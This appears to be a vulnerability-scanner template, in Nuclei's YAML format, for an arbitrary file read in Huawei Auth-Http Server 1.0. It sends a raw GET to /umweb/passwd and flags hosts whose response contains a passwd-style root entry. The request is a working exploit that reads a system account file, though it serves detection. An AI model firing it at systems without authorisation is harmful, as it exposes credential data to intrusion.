id: huawei-auth-http-server-file-read

info:
  name: Huawei Auth-Http Server 1.0 Arbitrary File Read
  author: anonymous
  severity: medium
  tags: file-read, huawei

http:
  - raw:
    - |
      GET /umweb/passwd HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
      Accept-Charset: utf-8
      Accept-Encoding: gzip

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
